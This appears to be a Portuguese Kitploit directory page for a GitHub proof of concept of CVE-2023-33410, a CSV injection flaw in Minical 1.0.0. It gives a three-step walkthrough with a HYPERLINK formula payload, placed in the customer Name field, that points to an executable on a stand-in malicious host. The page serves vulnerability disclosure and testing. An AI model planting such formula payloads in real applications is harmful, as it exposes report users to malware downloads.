Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-33410 — Prova de conceito demonstrando vulnerabilidade de injeção de CSV no Minical 1.0.0 através de payload HYPERLINK malicioso no campo nome do cliente, levando à execução remota de código quando o relatório é baixado. | Kitploit
Ferramentas/GitHubGitHub/thirukrishnan/cve-2023-33410
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubthirukrishnan/cve-2023-33410

CVE-2023-33410

Prova de conceito demonstrando vulnerabilidade de injeção de CSV no Minical 1.0.0 através de payload HYPERLINK malicioso no campo nome do cliente, levando à execução remota de código quando o relatório é baixado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 3 anosAinda não revisado

CVE-2023-33410

Minical 1.0.0 é vulnerável a Injeção de CSV.

Fornecedor: https://github.com/minical/minical

Aplicação de Demonstração: https://demo.minical.io/


Prova de Conceito

Passo 1: Navegue até o módulo de Contabilidade e clique em Criar Novo Cliente.

image

Passo 2: Insira o payload no campo Nome e clique em Criar.

Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")

image

image

Passo 3: Clique em Baixar Relatório CSV e observe o payload sendo renderizado.

image

Baixar ferramenta